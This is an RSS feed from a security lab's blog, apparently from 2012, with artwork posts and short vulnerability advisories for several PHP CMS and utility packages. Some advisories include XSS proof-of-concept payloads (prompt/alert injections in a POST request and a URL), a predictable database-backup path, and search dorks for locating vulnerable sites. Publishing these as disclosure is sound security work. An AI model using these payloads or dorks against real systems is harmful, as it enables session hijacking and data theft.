<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Zero Science Lab</title>
	<atom:link href="http://zeroscience.mk/blog/feed/" rel="self" type="application/rss+xml" />
	<link>http://zeroscience.mk/blog</link>
	<description>Macedonian information security research and development laboratory</description>
	<lastBuildDate>Wed, 16 May 2012 16:13:05 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
		<item>
		<title>Project KoKiNo</title>
		<link>http://zeroscience.mk/blog/05/2012/project-kokino/</link>
		<comments>http://zeroscience.mk/blog/05/2012/project-kokino/#comments</comments>
		<pubDate>Wed, 16 May 2012 16:12:11 +0000</pubDate>
		<dc:creator>zeroscience</dc:creator>
				<category><![CDATA[Graphics]]></category>
		<category><![CDATA[ancient]]></category>
		<category><![CDATA[design]]></category>
		<category><![CDATA[drowsy]]></category>
		<category><![CDATA[igec]]></category>
		<category><![CDATA[kokino]]></category>
		<category><![CDATA[kumanovo]]></category>
		<category><![CDATA[Macedonia]]></category>
		<category><![CDATA[nature]]></category>
		<category><![CDATA[observatory]]></category>
		<category><![CDATA[observers]]></category>
		<category><![CDATA[panorama]]></category>
		<category><![CDATA[photography]]></category>
		<category><![CDATA[shoo6]]></category>
		<category><![CDATA[zero science lab]]></category>

		<guid isPermaLink="false">http://zeroscience.mk/blog/?p=793</guid>
		<description><![CDATA[http://liquidworm.deviantart.com/art/The-Observers-301017154 http://liquidworm.deviantart.com/art/Shoo6-301016589]]></description>
			<content:encoded><![CDATA[<p><img alt="" src="http://fc05.deviantart.net/fs71/i/2012/130/c/4/the_observers_by_liquidworm-d4z7ubm.jpg" title="The Observers" class="alignnone" width="96%" height="96%" /></p>
<p><a href="http://liquidworm.deviantart.com/art/The-Observers-301017154">http://liquidworm.deviantart.com/art/The-Observers-301017154</a></p>
<p><img alt="" src="http://fc07.deviantart.net/fs70/i/2012/130/8/9/shoo6_by_liquidworm-d4z7tvx.jpg" title="Shoo6" class="alignnone" width="96%" height="96%" /></p>
<p><a href="http://liquidworm.deviantart.com/art/Shoo6-301016589">http://liquidworm.deviantart.com/art/Shoo6-301016589</a></p>
]]></content:encoded>
			<wfw:commentRss>http://zeroscience.mk/blog/05/2012/project-kokino/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Artiphp CMS 5.5.0 Database Backup Disclosure Exploit</title>
		<link>http://zeroscience.mk/blog/05/2012/artiphp-cms-5-5-0-database-backup-disclosure-exploit/</link>
		<comments>http://zeroscience.mk/blog/05/2012/artiphp-cms-5-5-0-database-backup-disclosure-exploit/#comments</comments>
		<pubDate>Wed, 16 May 2012 16:08:03 +0000</pubDate>
		<dc:creator>zeroscience</dc:creator>
				<category><![CDATA[Internal]]></category>
		<category><![CDATA[advisory]]></category>
		<category><![CDATA[artiphp]]></category>
		<category><![CDATA[backup]]></category>
		<category><![CDATA[CMS]]></category>
		<category><![CDATA[code]]></category>
		<category><![CDATA[database]]></category>
		<category><![CDATA[DB]]></category>
		<category><![CDATA[disclosure]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[predictable]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[експлоит]]></category>
		<category><![CDATA[код]]></category>
		<category><![CDATA[предупредување]]></category>
		<category><![CDATA[ранливост]]></category>
		<category><![CDATA[слабост]]></category>

		<guid isPermaLink="false">http://zeroscience.mk/blog/?p=789</guid>
		<description><![CDATA[Artiphp stores database backups using backupDB() utility with a predictable file name inside the web root, which can be exploited to disclose sensitive information by downloading the file. The backup is located in &#8216;/artzone/artpublic/database/&#8217; directory as &#8216;db_backup_[type].[yyyy-mm-dd].sql.gz&#8217; filename. Advisory ID: ZSL-2012-5091 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5091.php]]></description>
			<content:encoded><![CDATA[<p>Artiphp stores database backups using backupDB() utility with a predictable file name inside the web root, which can be exploited to disclose sensitive information by downloading the file. The backup is located in &#8216;/artzone/artpublic/database/&#8217; directory as &#8216;db_backup_[type].[yyyy-mm-dd].sql.gz&#8217; filename.</p>
<p>Advisory ID: <strong>ZSL-2012-5091</strong><br />
Advisory URL: <a href="http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5091.php">http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5091.php</a></p>
<p><a href="http://zeroscience.mk/blog/wp-content/uploads/2012/05/artiphpexploit2.png"><img src="http://zeroscience.mk/blog/wp-content/uploads/2012/05/artiphpexploit2-300x147.png" alt="" title="Artiphp CMS Exploit" width="300" height="147" class="aligncenter size-medium wp-image-790" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://zeroscience.mk/blog/05/2012/artiphp-cms-5-5-0-database-backup-disclosure-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Artiphp CMS v5.5.0 Multiple XSS POST Injection Vulnerabilities</title>
		<link>http://zeroscience.mk/blog/05/2012/artiphp-cms-v5-5-0-multiple-xss-post-injection-vulnerabilities/</link>
		<comments>http://zeroscience.mk/blog/05/2012/artiphp-cms-v5-5-0-multiple-xss-post-injection-vulnerabilities/#comments</comments>
		<pubDate>Wed, 16 May 2012 16:05:07 +0000</pubDate>
		<dc:creator>zeroscience</dc:creator>
				<category><![CDATA[Internal]]></category>
		<category><![CDATA[advisory]]></category>
		<category><![CDATA[artiphp]]></category>
		<category><![CDATA[CMS]]></category>
		<category><![CDATA[injection]]></category>
		<category><![CDATA[multiple]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[post]]></category>
		<category><![CDATA[remote]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[xss]]></category>
		<category><![CDATA[безбедност]]></category>
		<category><![CDATA[закана]]></category>
		<category><![CDATA[ранливост]]></category>
		<category><![CDATA[слабост]]></category>

		<guid isPermaLink="false">http://zeroscience.mk/blog/?p=787</guid>
		<description><![CDATA[Artiphp CMS suffers from multiple cross-site scripting vulnerabilities via several parameters thru POST method. Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user&#8217;s browser session. Advisory ID: ZSL-2012-5090 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5090.php PoC: POST /artpublic/recommandation/index.php HTTP/1.1 Content-Length: 619 Content-Type: application/x-www-form-urlencoded Cookie: ARTI=tsouvg67cld88k9ihbqfgk3k77 Host: localhost:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 [...]]]></description>
			<content:encoded><![CDATA[<p>Artiphp CMS suffers from multiple cross-site scripting vulnerabilities via several parameters thru POST method. Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user&#8217;s browser session.</p>
<p>Advisory ID: <strong>ZSL-2012-5090</strong><br />
Advisory URL: <a href="http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5090.php">http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5090.php</a></p>
<p>PoC:<br />
<code><br />
POST /artpublic/recommandation/index.php HTTP/1.1<br />
Content-Length: 619<br />
Content-Type: application/x-www-form-urlencoded<br />
Cookie: ARTI=tsouvg67cld88k9ihbqfgk3k77<br />
Host: localhost:80<br />
Connection: Keep-alive<br />
Accept-Encoding: gzip,deflate<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)</p>
<p>add_img_name_post			"onmouseover=prompt(1) joxy<br />
adresse_destinataire<br />
adresse_expediteur			lab%40zeroscience.mk<br />
asciiart_post				"onmouseover=prompt(2) joxy<br />
expediteur				"onmouseover=prompt(3) joxy<br />
message					Hello%20World<br />
message1				%ef%bf%bd%20Recommand%20%ef%bf%bd%0a%bb%20http%3a%2f%2flocalhost%2fartpublic%2frecommandation%2f<br />
send					Send<br />
titre_sav				"onmouseover=prompt(4) joxy<br />
url_sav					http%3a%2f%2flocalhost%2fartpublic%2frecommandation%2f<br />
z39d27af885b32758ac0e7d4014a61561	"onmouseover=prompt(5) joxy<br />
zd178e6cdc57b8d6ba3024675f443e920	2<br />
</code></p>
]]></content:encoded>
			<wfw:commentRss>http://zeroscience.mk/blog/05/2012/artiphp-cms-v5-5-0-multiple-xss-post-injection-vulnerabilities/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>backupDB() v1.2.7a (onlyDB) Remote XSS Vulnerability</title>
		<link>http://zeroscience.mk/blog/05/2012/backupdb-v1-2-7a-onlydb-remote-xss-vulnerability/</link>
		<comments>http://zeroscience.mk/blog/05/2012/backupdb-v1-2-7a-onlydb-remote-xss-vulnerability/#comments</comments>
		<pubDate>Wed, 16 May 2012 16:03:10 +0000</pubDate>
		<dc:creator>zeroscience</dc:creator>
				<category><![CDATA[Internal]]></category>
		<category><![CDATA[advisory]]></category>
		<category><![CDATA[backupDB]]></category>
		<category><![CDATA[onlydb]]></category>
		<category><![CDATA[parameter]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[reflected]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[utility]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[xss]]></category>
		<category><![CDATA[закана]]></category>
		<category><![CDATA[ранливост]]></category>
		<category><![CDATA[слабост]]></category>

		<guid isPermaLink="false">http://zeroscience.mk/blog/?p=785</guid>
		<description><![CDATA[backupDB is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the &#8216;onlyDB&#8217; parameter of the &#8216;backupDB.php&#8217; script. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user&#8217;s browser session. Advisory ID: ZSL-2012-5089 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5089.php]]></description>
			<content:encoded><![CDATA[<p>backupDB is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the &#8216;onlyDB&#8217; parameter of the &#8216;backupDB.php&#8217; script. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user&#8217;s browser session.</p>
<p>Advisory ID: <strong>ZSL-2012-5089</strong><br />
Advisory URL: <a href="http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5089.php">http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5089.php</a></p>
]]></content:encoded>
			<wfw:commentRss>http://zeroscience.mk/blog/05/2012/backupdb-v1-2-7a-onlydb-remote-xss-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>phpThumb() v1.7.11 (dir &amp; title) Cross-Site Scripting Vulnerability</title>
		<link>http://zeroscience.mk/blog/05/2012/phpthumb-v1-7-11-dir-title-cross-site-scripting-vulnerability/</link>
		<comments>http://zeroscience.mk/blog/05/2012/phpthumb-v1-7-11-dir-title-cross-site-scripting-vulnerability/#comments</comments>
		<pubDate>Wed, 16 May 2012 16:00:56 +0000</pubDate>
		<dc:creator>zeroscience</dc:creator>
				<category><![CDATA[Internal]]></category>
		<category><![CDATA[advisory]]></category>
		<category><![CDATA[cross-site]]></category>
		<category><![CDATA[dir]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[phpthumb]]></category>
		<category><![CDATA[remote]]></category>
		<category><![CDATA[scripting]]></category>
		<category><![CDATA[title]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[xss]]></category>
		<category><![CDATA[безбедност]]></category>
		<category><![CDATA[ранливост]]></category>
		<category><![CDATA[слабост]]></category>

		<guid isPermaLink="false">http://zeroscience.mk/blog/?p=783</guid>
		<description><![CDATA[phpThumb is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the &#8216;dir&#8217; and the &#8216;title&#8217; parameter of the &#8216;phpThumb.demo.random.php&#8217; and &#8216;phpThumb.demo.showpic.php&#8217; scripts. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user&#8217;s browser session. Advisory ID: [...]]]></description>
			<content:encoded><![CDATA[<p>phpThumb is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the &#8216;dir&#8217; and the &#8216;title&#8217; parameter of the &#8216;phpThumb.demo.random.php&#8217; and &#8216;phpThumb.demo.showpic.php&#8217; scripts. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user&#8217;s browser session.</p>
<p>Advisory ID: <strong>ZSL-2012-5088</strong><br />
Advisory URL: <a href="http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5088.php">http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5088.php</a></p>
]]></content:encoded>
			<wfw:commentRss>http://zeroscience.mk/blog/05/2012/phpthumb-v1-7-11-dir-title-cross-site-scripting-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Andromeda Streaming MP3 Server v1.9.3.6 (s param) Remote XSS Vulnerability</title>
		<link>http://zeroscience.mk/blog/05/2012/andromeda-streaming-mp3-server-v1-9-3-6-s-param-remote-xss-vulnerability/</link>
		<comments>http://zeroscience.mk/blog/05/2012/andromeda-streaming-mp3-server-v1-9-3-6-s-param-remote-xss-vulnerability/#comments</comments>
		<pubDate>Wed, 09 May 2012 02:04:07 +0000</pubDate>
		<dc:creator>zeroscience</dc:creator>
				<category><![CDATA[Internal]]></category>
		<category><![CDATA[advisory]]></category>
		<category><![CDATA[andromeda]]></category>
		<category><![CDATA[mp3]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[server]]></category>
		<category><![CDATA[streaming]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[xss]]></category>
		<category><![CDATA[безбедност]]></category>
		<category><![CDATA[ранливост]]></category>
		<category><![CDATA[слабост]]></category>

		<guid isPermaLink="false">http://zeroscience.mk/blog/?p=778</guid>
		<description><![CDATA[Andromeda is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the &#8216;s&#8217; parameter of the &#8216;andromeda.php&#8217; script. Advisory ID: ZSL-2012-5087 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5087.php Dork: &#8220;powered by andromeda version&#8221; PoC: http://localhost/AndromedaPHP/andromeda.php?q=s&#038;s=&#8221;&#62;&#60;script&#62;alert(1);&#60;/script&#62;]]></description>
			<content:encoded><![CDATA[<p>Andromeda is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the &#8216;s&#8217; parameter of the &#8216;andromeda.php&#8217; script.</p>
<p>Advisory ID: <strong>ZSL-2012-5087</strong><br />
Advisory URL: <a href="http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5087.php">http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5087.php</a></p>
<p> Dork: &#8220;powered by andromeda version&#8221;</p>
<p> PoC: http://localhost/AndromedaPHP/andromeda.php?q=s&#038;s=&#8221;&gt;&lt;script&gt;alert(1);&lt;/script&gt;</p>
]]></content:encoded>
			<wfw:commentRss>http://zeroscience.mk/blog/05/2012/andromeda-streaming-mp3-server-v1-9-3-6-s-param-remote-xss-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Baby Gekko CMS v1.1.5c Multiple Stored Cross-Site Scripting Vulnerabilities</title>
		<link>http://zeroscience.mk/blog/05/2012/baby-gekko-cms-v1-1-5c-multiple-stored-cross-site-scripting-vulnerabilities/</link>
		<comments>http://zeroscience.mk/blog/05/2012/baby-gekko-cms-v1-1-5c-multiple-stored-cross-site-scripting-vulnerabilities/#comments</comments>
		<pubDate>Wed, 02 May 2012 20:02:35 +0000</pubDate>
		<dc:creator>zeroscience</dc:creator>
				<category><![CDATA[Internal]]></category>
		<category><![CDATA[advisory]]></category>
		<category><![CDATA[baby]]></category>
		<category><![CDATA[babygekko]]></category>
		<category><![CDATA[CMS]]></category>
		<category><![CDATA[cross-site]]></category>
		<category><![CDATA[fix]]></category>
		<category><![CDATA[gekko]]></category>
		<category><![CDATA[patch]]></category>
		<category><![CDATA[persistent]]></category>
		<category><![CDATA[scripting]]></category>
		<category><![CDATA[solution]]></category>
		<category><![CDATA[stored]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[xss]]></category>
		<category><![CDATA[zero science lab]]></category>
		<category><![CDATA[zsl]]></category>
		<category><![CDATA[ZSL-2012-5086]]></category>
		<category><![CDATA[безбедност]]></category>
		<category><![CDATA[закрпа]]></category>
		<category><![CDATA[ранливост]]></category>
		<category><![CDATA[слабост]]></category>

		<guid isPermaLink="false">http://zeroscience.mk/blog/?p=776</guid>
		<description><![CDATA[Baby Gekko CMS suffers from multiple stored (post-auth) XSS vulnerabilities and path disclosure issues when parsing user input to several parameters via GET and POST method. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user&#8217;s browser session or disclose the full installation path of the affected CMS. &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211; Reflected [...]]]></description>
			<content:encoded><![CDATA[<p>Baby Gekko CMS suffers from multiple stored (post-auth) XSS vulnerabilities and path disclosure issues when parsing user input to several parameters via GET and POST method. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user&#8217;s browser session or disclose the full installation path of the affected CMS.</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>Reflected (Non-Persistent) XSS:</p>
<p> 1. username<br />
 2. password<br />
 3. verification_code<br />
 4. email_address<br />
 5. password_verify<br />
 6. firstname<br />
 7. lastname</p>
<p>Stored (Persistent) XSS:</p>
<p> 8. groupname<br />
 9. virtual_filename<br />
10. branch<br />
11. contact_person<br />
12. street<br />
13. city<br />
14. province<br />
15. postal<br />
16. country<br />
17. tollfree<br />
18. phone<br />
19. fax<br />
20. mobile<br />
21. title<br />
22. meta_key<br />
23. meta_description</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>Advisory: <a href="http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5086.php">http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5086.php</a><br />
Vendor: <a href="http://www.babygekko.com/site/news/general/baby-gekko-v1-2-0-released-with-3rd-party-independent-security-testing-performed-by-zero-science-lab.html">http://www.babygekko.com/site/news/general/baby-gekko-v1-2-0-released-with-3rd-party-independent-security-testing-performed-by-zero-science-lab.html</a></p>
]]></content:encoded>
			<wfw:commentRss>http://zeroscience.mk/blog/05/2012/baby-gekko-cms-v1-1-5c-multiple-stored-cross-site-scripting-vulnerabilities/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Rekniht</title>
		<link>http://zeroscience.mk/blog/04/2012/rekniht/</link>
		<comments>http://zeroscience.mk/blog/04/2012/rekniht/#comments</comments>
		<pubDate>Thu, 26 Apr 2012 13:36:42 +0000</pubDate>
		<dc:creator>zeroscience</dc:creator>
				<category><![CDATA[Graphics]]></category>
		<category><![CDATA[design]]></category>
		<category><![CDATA[photoshop]]></category>
		<category><![CDATA[rekniht]]></category>
		<category><![CDATA[thinker]]></category>

		<guid isPermaLink="false">http://zeroscience.mk/blog/?p=773</guid>
		<description><![CDATA[http://liquidworm.deviantart.com/art/Rekniht-298512176]]></description>
			<content:encoded><![CDATA[<p><img alt="" src="http://fc07.deviantart.net/fs71/i/2012/117/1/b/rekniht_by_liquidworm-d4xq5gw.jpg" title="Rekniht" class="aligncenter" width="96%" height="96%" /></p>
<p><a href="http://liquidworm.deviantart.com/art/Rekniht-298512176">http://liquidworm.deviantart.com/art/Rekniht-298512176</a></p>
]]></content:encoded>
			<wfw:commentRss>http://zeroscience.mk/blog/04/2012/rekniht/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Anchor CMS v0.6 Multiple Persistent XSS Vulnerabilities</title>
		<link>http://zeroscience.mk/blog/04/2012/anchor-cms-v0-6-multiple-persistent-xss-vulnerabilities/</link>
		<comments>http://zeroscience.mk/blog/04/2012/anchor-cms-v0-6-multiple-persistent-xss-vulnerabilities/#comments</comments>
		<pubDate>Fri, 20 Apr 2012 17:46:07 +0000</pubDate>
		<dc:creator>zeroscience</dc:creator>
				<category><![CDATA[Internal]]></category>
		<category><![CDATA[advisory]]></category>
		<category><![CDATA[anchor]]></category>
		<category><![CDATA[anchorcms]]></category>
		<category><![CDATA[CMS]]></category>
		<category><![CDATA[cross-site]]></category>
		<category><![CDATA[non-reflected]]></category>
		<category><![CDATA[persistent]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[remote]]></category>
		<category><![CDATA[scripting]]></category>
		<category><![CDATA[stored]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[xss]]></category>
		<category><![CDATA[безбедност]]></category>
		<category><![CDATA[закана]]></category>
		<category><![CDATA[информации]]></category>
		<category><![CDATA[предупредување]]></category>
		<category><![CDATA[ранливост]]></category>
		<category><![CDATA[слабост]]></category>

		<guid isPermaLink="false">http://zeroscience.mk/blog/?p=768</guid>
		<description><![CDATA[Anchor CMS suffers from multiple stored and reflected XSS vulnerabilities when parsing user input to several parameters via GET and POST method. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user&#8217;s browser session. Dork: &#8220;intext:Powered by Anchor, version 0.6&#8221; Advisory ID: ZSL-2012-5085 Advisory details: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5085.php]]></description>
			<content:encoded><![CDATA[<p>Anchor CMS suffers from multiple stored and reflected XSS vulnerabilities when parsing user input to several parameters via GET and POST method. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user&#8217;s browser session.</p>
<p>Dork: &#8220;<strong>intext:Powered by Anchor, version 0.6</strong>&#8221;</p>
<p>Advisory ID: <strong>ZSL-2012-5085</strong><br />
Advisory details: <a href="http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5085.php">http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5085.php</a></p>
]]></content:encoded>
			<wfw:commentRss>http://zeroscience.mk/blog/04/2012/anchor-cms-v0-6-multiple-persistent-xss-vulnerabilities/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>BGS CMS v2.2.1 Multiple Stored Cross-Site Scripting Vulnerabilities</title>
		<link>http://zeroscience.mk/blog/04/2012/bgs-cms-v2-2-1-multiple-stored-cross-site-scripting-vulnerabilities/</link>
		<comments>http://zeroscience.mk/blog/04/2012/bgs-cms-v2-2-1-multiple-stored-cross-site-scripting-vulnerabilities/#comments</comments>
		<pubDate>Wed, 11 Apr 2012 02:04:51 +0000</pubDate>
		<dc:creator>zeroscience</dc:creator>
				<category><![CDATA[Internal]]></category>
		<category><![CDATA[advisory]]></category>
		<category><![CDATA[bgs]]></category>
		<category><![CDATA[CMS]]></category>
		<category><![CDATA[cross-site]]></category>
		<category><![CDATA[multiple]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[scripting]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[stored]]></category>
		<category><![CDATA[vulnerabilities]]></category>
		<category><![CDATA[xss]]></category>
		<category><![CDATA[предупредување]]></category>
		<category><![CDATA[ранливости]]></category>
		<category><![CDATA[слабости]]></category>

		<guid isPermaLink="false">http://zeroscience.mk/blog/?p=764</guid>
		<description><![CDATA[BGS CMS suffers from multiple stored and reflected XSS vulnerabilities when parsing user input to several parameters via GET and POST method (post-auth). Attackers can exploit this weakness to execute arbitrary HTML and script code in a user&#8217;s browser session. Dork: footer: &#8220;powered by BGS CMS&#8221; Advisory ID: ZSL-2012-5084 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5084.php]]></description>
			<content:encoded><![CDATA[<p><a href="http://zeroscience.mk/blog/wp-content/uploads/2012/04/bgscms_xss2.png"><img src="http://zeroscience.mk/blog/wp-content/uploads/2012/04/bgscms_xss2-300x170.png" alt="" title="BGS CMS XSS" width="300" height="170" class="aligncenter size-medium wp-image-765" /></a></p>
<p>BGS CMS suffers from multiple stored and reflected XSS vulnerabilities when parsing user input to several parameters via GET and POST method (post-auth). Attackers can exploit this weakness to execute arbitrary HTML and script code in a user&#8217;s browser session.</p>
<p>Dork: <strong>footer: &#8220;powered by BGS CMS&#8221;</strong></p>
<p>Advisory ID: ZSL-2012-5084<br />
Advisory URL: <a href="http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5084.php">http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5084.php</a></p>
]]></content:encoded>
			<wfw:commentRss>http://zeroscience.mk/blog/04/2012/bgs-cms-v2-2-1-multiple-stored-cross-site-scripting-vulnerabilities/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

